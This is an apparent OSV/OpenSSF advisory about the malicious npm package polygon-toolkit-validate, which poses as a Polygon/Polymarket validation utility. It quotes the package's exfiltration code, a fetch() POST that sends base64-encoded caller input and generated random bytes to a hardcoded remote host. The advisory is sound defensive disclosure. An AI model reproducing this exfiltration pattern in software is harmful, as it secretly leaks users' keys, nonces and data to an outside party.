MAL-2026-4642

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/polygon-toolkit-validate/MAL-2026-4642.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4642
Published
2026-05-21T01:31:55Z
Modified
2026-05-26T06:02:47.597626131Z
Summary
Malicious code in polygon-toolkit-validate (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c)

The package presents itself as a Polygon/Polymarket validation/crypto utility, but its exported APIs silently relay caller data to a hardcoded remote endpoint. In dist/index.js, validate(content) base64-encodes its argument and POSTs it to https://validator.polymarket.shop/v2 via checkvalidator (fetch("https://validator.polymarket.shop/v2",{method:"POST",...,body:JSON.stringify({action:"validator",content:btoa(t)})})). randomBytes(n) generates cryptographic bytes via crypto.randomBytes(n).toString('hex') and then passes that hex string through the same checkvalidator POST before returning it, so any caller using it as a drop-in for crypto.randomBytes leaks nonces, keys and IVs to the operator of polymarket.shop. The package name impersonates the Polygon/Polymarket ecosystems while its repository URL points to an unrelated 'serhiidemianov/validate-solana' project, consistent with namespace abuse intended to lure developers into a credential-leaking utility. Any code that imports and uses this package's advertised functions silently transmits its inputs and generated cryptographic material off-host.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-003691",
            "versions": [
                "1.0.5"
            ],
            "sha256": "77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T01:31:55Z",
            "import_time": "2026-05-26T05:51:07.29953647Z"
        }
    ]
}
References
Credits

Affected packages

npm / polygon-toolkit-validate

Package

Name
polygon-toolkit-validate
Purl
pkg:npm/polygon-toolkit-validate

Affected ranges

Affected versions

1.*
1.0.5

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "dist/index.js",
            "sha256": "2e2074f73f578a2b1ecfdb1e074ebd89c8ac45f2cb8127ed00102bf7bca5b6b6",
            "tlsh": "e1511fa33881d5710ff058f9607b8143f1f51e0ba104a995e2c9acaba0f8c8c52ba93d"
        },
        {
            "path": "package.json",
            "sha256": "bd81e92b9e8ac3bd6871a23ed55af8fe122278c7031028db8f1fcaf5949e6040",
            "tlsh": "7d019e34c874c6630bc412f55cb59653e5b2891f9408bc0832c6012c87cfbab04fc2dd"
        }
    ],
    "package_integrity": [
        {
            "filename": "polygon-toolkit-validate-1.0.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-sWjKNZZ3zo+ptHHCE35zfE/bP2JmaJ1cldivOSUukkRQvKZBQjCGPqgQR8E1/RTZVWL7ro9B+byR7DxP6DPYdA==",
                "sha1": "d156a775b6b0f29ced89b7ed07f037131c2e83e4"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/polygon-toolkit-validate/MAL-2026-4642.json"